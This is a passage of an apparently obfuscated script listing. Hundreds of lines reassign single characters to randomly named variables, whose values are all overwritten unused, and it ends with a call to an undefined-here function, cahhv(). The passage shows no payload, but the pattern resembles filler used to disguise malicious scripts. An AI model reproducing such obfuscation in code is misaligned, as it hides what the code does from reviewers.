789 | wyvwr = "k"; | |
790 | wyvwr = "e"; | |
791 | wyvwr = "p"; | |
792 | wyvwr = "p"; | |
793 | wyvwr = "T"; | |
794 | wyvwr = "1"; | |
795 | itfpszi = "H"; | |
796 | itfpszi = "o"; | |
797 | itfpszi = "h"; | |
798 | itfpszi = "O"; | |
799 | itfpszi = "J"; | |
800 | itfpszi = "v"; | |
801 | itfpszi = "K"; | |
802 | itfpszi = "p"; | |
803 | itfpszi = "M"; | |
804 | itfpszi = "v"; | |
805 | itfpszi = "E"; | |
806 | itfpszi = "m"; | |
807 | itfpszi = "T"; | |
808 | itfpszi = "W"; | |
809 | itfpszi = "w"; | |
810 | itfpszi = "d"; | |
811 | itfpszi = "c"; | |
812 | itfpszi = "n"; | |
813 | itfpszi = "q"; | |
814 | itfpszi = "k"; | |
815 | itfpszi = "m"; | |
816 | itfpszi = "X"; | |
817 | itfpszi = "h"; | |
818 | itfpszi = "R"; | |
819 | itfpszi = "k"; | |
820 | itfpszi = "v"; | |
821 | itfpszi = "s"; | |
822 | itfpszi = "n"; | |
823 | itfpszi = "V"; | |
824 | itfpszi = "J"; | |
825 | itfpszi = "B"; | |
826 | itfpszi = "h"; | |
827 | itfpszi = "c"; | |
828 | itfpszi = "c"; | |
829 | itfpszi = "u"; | |
830 | itfpszi = "Y"; | |
831 | pfuygxtzq = "A"; | |
832 | pfuygxtzq = "G"; | |
833 | pfuygxtzq = "i"; | |
834 | pfuygxtzq = "B"; | |
835 | pfuygxtzq = "w"; | |
836 | pfuygxtzq = "S"; | |
837 | pfuygxtzq = "s"; | |
838 | pfuygxtzq = "x"; | |
839 | yibntkcg = "a"; | |
840 | yibntkcg = "D"; | |
841 | yibntkcg = "L"; | |
842 | yibntkcg = "f"; | |
843 | yibntkcg = "W"; | |
844 | yibntkcg = "B"; | |
845 | yibntkcg = "I"; | |
846 | yibntkcg = "H"; | |
847 | yibntkcg = "c"; | |
848 | yibntkcg = "n"; | |
849 | yibntkcg = "w"; | |
850 | yibntkcg = "v"; | |
851 | yibntkcg = "J"; | |
852 | yibntkcg = "B"; | |
853 | yibntkcg = "V"; | |
854 | yibntkcg = "L"; | |
855 | yibntkcg = "K"; | |
856 | yibntkcg = "H"; | |
857 | yibntkcg = "X"; | |
858 | yibntkcg = "H"; | |
859 | yibntkcg = "n"; | |
860 | yibntkcg = "w"; | |
861 | yibntkcg = "g"; | |
862 | yibntkcg = "g"; | |
863 | yibntkcg = "S"; | |
864 | yibntkcg = "S"; | |
865 | yibntkcg = "B"; | |
866 | yibntkcg = "I"; | |
867 | yibntkcg = "i"; | |
868 | yibntkcg = "e"; | |
869 | yibntkcg = "L"; | |
870 | yibntkcg = "B"; | |
871 | yibntkcg = "O"; | |
872 | yibntkcg = "r"; | |
873 | clycvi = "n"; | |
874 | clycvi = "b"; | |
875 | clycvi = "l"; | |
876 | clycvi = "Y"; | |
877 | clycvi = "r"; | |
878 | clycvi = "s"; | |
879 | clycvi = "P"; | |
880 | clycvi = "x"; | |
881 | clycvi = "Y"; | |
882 | clycvi = "i"; | |
883 | clycvi = "S"; | |
884 | ulfbgcyi = "q"; | |
885 | ulfbgcyi = "B"; | |
886 | ulfbgcyi = "W"; | |
887 | ulfbgcyi = "q"; | |
888 | ulfbgcyi = "S"; | |
889 | ulfbgcyi = "S"; | |
890 | ulfbgcyi = "D"; | |
891 | ulfbgcyi = "F"; | |
892 | ulfbgcyi = "z"; | |
893 | ulfbgcyi = "q"; | |
894 | ulfbgcyi = "m"; | |
895 | ulfbgcyi = "o"; | |
896 | ulfbgcyi = "c"; | |
897 | ulfbgcyi = "R"; | |
898 | ulfbgcyi = "R"; | |
899 | ulfbgcyi = "K"; | |
900 | ulfbgcyi = "t"; | |
901 | ulfbgcyi = "L"; | |
902 | ulfbgcyi = "W"; | |
903 | ulfbgcyi = "O"; | |
904 | ulfbgcyi = "S"; | |
905 | ulfbgcyi = "G"; | |
906 | ulfbgcyi = "C"; | |
907 | ulfbgcyi = "R"; | |
908 | ulfbgcyi = "Z"; | |
909 | ulfbgcyi = "j"; | |
910 | ulfbgcyi = "c"; | |
911 | ulfbgcyi = "s"; | |
912 | ulfbgcyi = "f"; | |
913 | ulfbgcyi = "C"; | |
914 | ulfbgcyi = "x"; | |
915 | ulfbgcyi = "I"; | |
916 | qivhgnib = "w"; | |
917 | qivhgnib = "I"; | |
918 | qivhgnib = "N"; | |
919 | qivhgnib = "N"; | |
920 | qivhgnib = "W"; | |
921 | qivhgnib = "H"; | |
922 | qivhgnib = "X"; | |
923 | qivhgnib = "V"; | |
924 | qivhgnib = "L"; | |
925 | qivhgnib = "I"; | |
926 | qivhgnib = "Y"; | |
927 | qivhgnib = "Z"; | |
928 | qivhgnib = "J"; | |
929 | qivhgnib = "V"; | |
930 | qivhgnib = "q"; | |
931 | qivhgnib = "F"; | |
932 | qivhgnib = "o"; | |
933 | qivhgnib = "W"; | |
934 | qivhgnib = "g"; | |
935 | qivhgnib = "w"; | |
936 | qivhgnib = "Z"; | |
937 | qivhgnib = "g"; | |
938 | qivhgnib = "z"; | |
939 | qivhgnib = "N"; | |
940 | qivhgnib = "I"; | |
941 | qivhgnib = "r"; | |
942 | qivhgnib = "Z"; | |
943 | qivhgnib = "E"; | |
944 | qivhgnib = "R"; | |
945 | dedsbjcet = "w"; | |
946 | dedsbjcet = "H"; | |
947 | dedsbjcet = "z"; | |
948 | dedsbjcet = "d"; | |
949 | dedsbjcet = "S"; | |
950 | dedsbjcet = "G"; | |
951 | dedsbjcet = "M"; | |
952 | dedsbjcet = "e"; | |
953 | dedsbjcet = "Z"; | |
954 | dedsbjcet = "N"; | |
955 | dedsbjcet = "A"; | |
956 | dedsbjcet = "y"; | |
957 | dedsbjcet = "y"; | |
958 | dedsbjcet = "a"; | |
959 | dedsbjcet = "H"; | |
960 | dedsbjcet = "U"; | |
961 | dedsbjcet = "n"; | |
962 | dedsbjcet = "f"; | |
963 | dedsbjcet = "w"; | |
964 | dedsbjcet = "b"; | |
965 | dedsbjcet = "c"; | |
966 | dedsbjcet = "w"; | |
967 | dedsbjcet = "E"; | |
968 | dedsbjcet = "B"; | |
969 | dedsbjcet = "B"; | |
970 | dedsbjcet = "m"; | |
971 | dedsbjcet = "t"; | |
972 | dedsbjcet = "m"; | |
973 | dedsbjcet = "d"; | |
974 | dedsbjcet = "U"; | |
975 | dedsbjcet = "a"; | |
976 | dedsbjcet = "w"; | |
977 | dedsbjcet = "o"; | |
978 | dedsbjcet = "i"; | |
979 | dedsbjcet = "F"; | |
980 | dedsbjcet = "L"; | |
981 | dedsbjcet = "s"; | |
982 | dedsbjcet = "s"; | |
983 | dedsbjcet = "g"; | |
984 | sgsgfg = "F"; | |
985 | sgsgfg = "S"; | |
986 | sgsgfg = "F"; | |
987 | sgsgfg = "H"; | |
988 | hndcghhma = "s"; | |
989 | hndcghhma = "e"; | |
990 | hndcghhma = "f"; | |
991 | hndcghhma = "x"; | |
992 | hndcghhma = "w"; | |
993 | hndcghhma = "y"; | |
994 | hndcghhma = "v"; | |
995 | hndcghhma = "t"; | |
996 | hndcghhma = "y"; | |
997 | hndcghhma = "a"; | |
998 | hndcghhma = "U"; | |
999 | hndcghhma = "k"; | |
1000 | hndcghhma = "e"; | |
1001 | hndcghhma = "P"; | |
1002 | hndcghhma = "J"; | |
1003 | hndcghhma = "X"; | |
1004 | hndcghhma = "B"; | |
1005 | hndcghhma = "v"; | |
1006 | hndcghhma = "Q"; | |
1007 | hndcghhma = "v"; | |
1008 | hndcghhma = "U"; | |
1009 | hndcghhma = "U"; | |
1010 | hndcghhma = "a"; | |
1011 | gaggurigg = "X"; | |
1012 | gaggurigg = "N"; | |
1013 | gaggurigg = "q"; | |
1014 | gaggurigg = "R"; | |
1015 | gaggurigg = "X"; | |
1016 | gaggurigg = "r"; | |
1017 | gaggurigg = "T"; | |
1018 | gaggurigg = "y"; | |
1019 | gaggurigg = "F"; | |
1020 | gaggurigg = "I"; | |
1021 | gaggurigg = "Y"; | |
1022 | gaggurigg = "y"; | |
1023 | gaggurigg = "n"; | |
1024 | icqrtpjl = "z"; | |
1025 | icqrtpjl = "I"; | |
1026 | icqrtpjl = "u"; | |
1027 | icqrtpjl = "P"; | |
1028 | icqrtpjl = "l"; | |
1029 | icqrtpjl = "u"; | |
1030 | icqrtpjl = "d"; | |
1031 | icqrtpjl = "B"; | |
1032 | icqrtpjl = "f"; | |
1033 | icqrtpjl = "o"; | |
1034 | icqrtpjl = "H"; | |
1035 | icqrtpjl = "o"; | |
1036 | icqrtpjl = "l"; | |
1037 | icqrtpjl = "V"; | |
1038 | icqrtpjl = "h"; | |
1039 | icqrtpjl = "Q"; | |
1040 | icqrtpjl = "u"; | |
1041 | apbmzms = "X"; | |
1042 | apbmzms = "k"; | |
1043 | apbmzms = "m"; | |
1044 | apbmzms = "i"; | |
1045 | apbmzms = "q"; | |
1046 | apbmzms = "k"; | |
1047 | njmarkjd = "U"; | |
1048 | njmarkjd = "z"; | |
1049 | njmarkjd = "w"; | |
1050 | njmarkjd = "A"; | |
1051 | njmarkjd = "M"; | |
1052 | njmarkjd = "o"; | |
1053 | njmarkjd = "K"; | |
1054 | njmarkjd = "k"; | |
1055 | njmarkjd = "F"; | |
1056 | njmarkjd = "E"; | |
1057 | njmarkjd = "Z"; | |
1058 | njmarkjd = "P"; | |
1059 | naitrjtq = "L"; | |
1060 | naitrjtq = "l"; | |
1061 | naitrjtq = "g"; | |
1062 | naitrjtq = "S"; | |
1063 | naitrjtq = "L"; | |
1064 | naitrjtq = "A"; | |
1065 | naitrjtq = "N"; | |
1066 | naitrjtq = "x"; | |
1067 | naitrjtq = "g"; | |
1068 | naitrjtq = "B"; | |
1069 | naitrjtq = "f"; | |
1070 | naitrjtq = "H"; | |
1071 | naitrjtq = "n"; | |
1072 | naitrjtq = "M"; | |
1073 | naitrjtq = "F"; | |
1074 | naitrjtq = "e"; | |
1075 | naitrjtq = "f"; | |
1076 | naitrjtq = "Z"; | |
1077 | naitrjtq = "H"; | |
1078 | naitrjtq = "i"; | |
1079 | naitrjtq = "Z"; | |
1080 | naitrjtq = "a"; | |
1081 | naitrjtq = "E"; | |
1082 | naitrjtq = "o"; | |
1083 | naitrjtq = "O"; | |
1084 | naitrjtq = "i"; | |
1085 | naitrjtq = "F"; | |
1086 | naitrjtq = "C"; | |
1087 | naitrjtq = "m"; | |
1088 | naitrjtq = "c"; | |
1089 | naitrjtq = "g"; | |
1090 | naitrjtq = "m"; | |
1091 | naitrjtq = "O"; | |
1092 | naitrjtq = "o"; | |
1093 | naitrjtq = "v"; | |
1094 | naitrjtq = "a"; | |
1095 | naitrjtq = "f"; | |
1096 | naitrjtq = "U"; | |
1097 | naitrjtq = "h"; | |
1098 | naitrjtq = "C"; | |
1099 | pxveq = "T"; | |
1100 | pxveq = "P"; | |
1101 | pxveq = "w"; | |
1102 | pxveq = "G"; | |
1103 | pxveq = "D"; | |
1104 | pxveq = "E"; | |
1105 | pxveq = "e"; | |
1106 | pxveq = "m"; | |
1107 | pxveq = "A"; | |
1108 | pxveq = "L"; | |
1109 | pxveq = "C"; | |
1110 | pxveq = "A"; | |
1111 | pxveq = "B"; | |
1112 | pxveq = "D"; | |
1113 | pxveq = "W"; | |
1114 | pxveq = "Y"; | |
1115 | pxveq = "S"; | |
1116 | pxveq = "C"; | |
1117 | pxveq = "F"; | |
1118 | pxveq = "b"; | |
1119 | pxveq = "d"; | |
1120 | pxveq = "t"; | |
1121 | pxveq = "U"; | |
1122 | pxveq = "G"; | |
1123 | pxveq = "r"; | |
1124 | pxveq = "U"; | |
1125 | pxveq = "x"; | |
1126 | pxveq = "m"; | |
1127 | pxveq = "L"; | |
1128 | pxveq = "G"; | |
1129 | pxveq = "w"; | |
1130 | uznrjlv = "P"; | |
1131 | uznrjlv = "L"; | |
1132 | uznrjlv = "d"; | |
1133 | uznrjlv = "K"; | |
1134 | uznrjlv = "V"; | |
1135 | uznrjlv = "R"; | |
1136 | uznrjlv = "Y"; | |
1137 | uznrjlv = "K"; | |
1138 | uznrjlv = "Z"; | |
1139 | uznrjlv = "M"; | |
1140 | uznrjlv = "W"; | |
1141 | uznrjlv = "j"; | |
1142 | uznrjlv = "w"; | |
1143 | uznrjlv = "P"; | |
1144 | uznrjlv = "D"; | |
1145 | uznrjlv = "P"; | |
1146 | uznrjlv = "t"; | |
1147 | uznrjlv = "x"; | |
1148 | uznrjlv = "Z"; | |
1149 | uznrjlv = "M"; | |
1150 | uznrjlv = "L"; | |
1151 | uznrjlv = "J"; | |
1152 | uznrjlv = "G"; | |
1153 | uznrjlv = "F"; | |
1154 | uznrjlv = "v"; | |
1155 | uznrjlv = "J"; | |
1156 | uznrjlv = "F"; | |
1157 | uznrjlv = "z"; | |
1158 | uznrjlv = "n"; | |
1159 | uznrjlv = "n"; | |
1160 | uznrjlv = "V"; | |
1161 | uznrjlv = "c"; | |
1162 | uznrjlv = "3"; | |
1163 | ezunts = "v"; | |
1164 | ezunts = "x"; | |
1165 | ezunts = "k"; | |
1166 | ezunts = "o"; | |
1167 | ezunts = "v"; | |
1168 | ezunts = "M"; | |
1169 | ezunts = "l"; | |
1170 | ezunts = "R"; | |
1171 | ezunts = "S"; | |
1172 | ezunts = "z"; | |
1173 | ezunts = "i"; | |
1174 | ezunts = "s"; | |
1175 | ezunts = "e"; | |
1176 | ezunts = "q"; | |
1177 | ezunts = "a"; | |
1178 | ezunts = "c"; | |
1179 | ezunts = "H"; | |
1180 | ezunts = "W"; | |
1181 | ezunts = "k"; | |
1182 | ezunts = "S"; | |
1183 | ezunts = "u"; | |
1184 | ezunts = "h"; | |
1185 | ezunts = "A"; | |
1186 | ezunts = "I"; | |
1187 | ezunts = "h"; | |
1188 | ezunts = "J"; | |
1189 | ezunts = "G"; | |
1190 | ezunts = "S"; | |
1191 | ezunts = "m"; | |
1192 | ezunts = "j"; | |
1193 | ezunts = "X"; | |
1194 | ezunts = "K"; | |
1195 | ezunts = "A"; | |
1196 | ezunts = "I"; | |
1197 | ezunts = "U"; | |
1198 | ezunts = "A"; | |
1199 | ezunts = "T"; | |
1200 | ezunts = "K"; | |
1201 | ezunts = "b"; | |
1202 | ezunts = "N"; | |
1203 | ezunts = "w"; | |
1204 | ezunts = "y"; | |
1205 | ezunts = "t"; | |
1206 | ezunts = "@"; | |
1207 | bsrcqdnjb = "T"; | |
1208 | bsrcqdnjb = "i"; | |
1209 | bsrcqdnjb = "n"; | |
1210 | bsrcqdnjb = "K"; | |
1211 | bsrcqdnjb = "D"; | |
1212 | bsrcqdnjb = "W"; | |
1213 | bsrcqdnjb = "W"; | |
1214 | bsrcqdnjb = "n"; | |
1215 | bsrcqdnjb = "E"; | |
1216 | bsrcqdnjb = "Z"; | |
1217 | bsrcqdnjb = "O"; | |
1218 | bsrcqdnjb = "x"; | |
1219 | bsrcqdnjb = "O"; | |
1220 | bsrcqdnjb = "G"; | |
1221 | bsrcqdnjb = "w"; | |
1222 | bsrcqdnjb = "U"; | |
1223 | bsrcqdnjb = "e"; | |
1224 | bsrcqdnjb = "e"; | |
1225 | bsrcqdnjb = "B"; | |
1226 | bsrcqdnjb = "E"; | |
1227 | bsrcqdnjb = "K"; | |
1228 | bsrcqdnjb = "q"; | |
1229 | bsrcqdnjb = "u"; | |
1230 | bsrcqdnjb = "D"; | |
1231 | bsrcqdnjb = "Q"; | |
1232 | bsrcqdnjb = "Q"; | |
1233 | bsrcqdnjb = "S"; | |
1234 | bsrcqdnjb = "I"; | |
1235 | bsrcqdnjb = "i"; | |
1236 | bsrcqdnjb = "T"; | |
1237 | bsrcqdnjb = "M"; | |
1238 | bsrcqdnjb = "J"; | |
1239 | bsrcqdnjb = "k"; | |
1240 | bsrcqdnjb = "g"; | |
1241 | bsrcqdnjb = "a"; | |
1242 | bsrcqdnjb = "Q"; | |
1243 | bsrcqdnjb = "Q"; | |
1244 | bsrcqdnjb = "d"; | |
1245 | bsrcqdnjb = "h"; | |
1246 | bsrcqdnjb = "t"; | |
1247 | bsrcqdnjb = " "; | |
1248 | skoqzhxu = "Y"; | |
1249 | skoqzhxu = "E"; | |
1250 | skoqzhxu = "o"; | |
1251 | skoqzhxu = "O"; | |
1252 | skoqzhxu = "X"; | |
1253 | skoqzhxu = "v"; | |
1254 | skoqzhxu = "A"; | |
1255 | skoqzhxu = "D"; | |
1256 | skoqzhxu = "S"; | |
1257 | skoqzhxu = "o"; | |
1258 | skoqzhxu = "j"; | |
1259 | skoqzhxu = "y"; | |
1260 | skoqzhxu = "m"; | |
1261 | skoqzhxu = "d"; | |
1262 | skoqzhxu = "Y"; | |
1263 | skoqzhxu = "g"; | |
1264 | skoqzhxu = "u"; | |
1265 | skoqzhxu = "w"; | |
1266 | skoqzhxu = "J"; | |
1267 | skoqzhxu = "B"; | |
1268 | skoqzhxu = "v"; | |
1269 | skoqzhxu = "h"; | |
1270 | skoqzhxu = "y"; | |
1271 | skoqzhxu = "I"; | |
1272 | skoqzhxu = "R"; | |
1273 | skoqzhxu = "U"; | |
1274 | skoqzhxu = "r"; | |
1275 | skoqzhxu = "u"; | |
1276 | skoqzhxu = "x"; | |
1277 | skoqzhxu = "C"; | |
1278 | skoqzhxu = "t"; | |
1279 | skoqzhxu = "X"; | |
1280 | skoqzhxu = "r"; | |
1281 | skoqzhxu = "W"; | |
1282 | skoqzhxu = "M"; | |
1283 | skoqzhxu = "l"; | |
1284 | skoqzhxu = "o"; | |
1285 | skoqzhxu = "B"; | |
1286 | skoqzhxu = "K"; | |
1287 | skoqzhxu = "F"; | |
1288 | wggeq = "C"; | |
1289 | wggeq = "P"; | |
1290 | wggeq = "s"; | |
1291 | wggeq = "p"; | |
1292 | wggeq = "t"; | |
1293 | wggeq = "p"; | |
1294 | wggeq = "j"; | |
1295 | wggeq = "\""; | |
1296 | cahhv ( ); |
|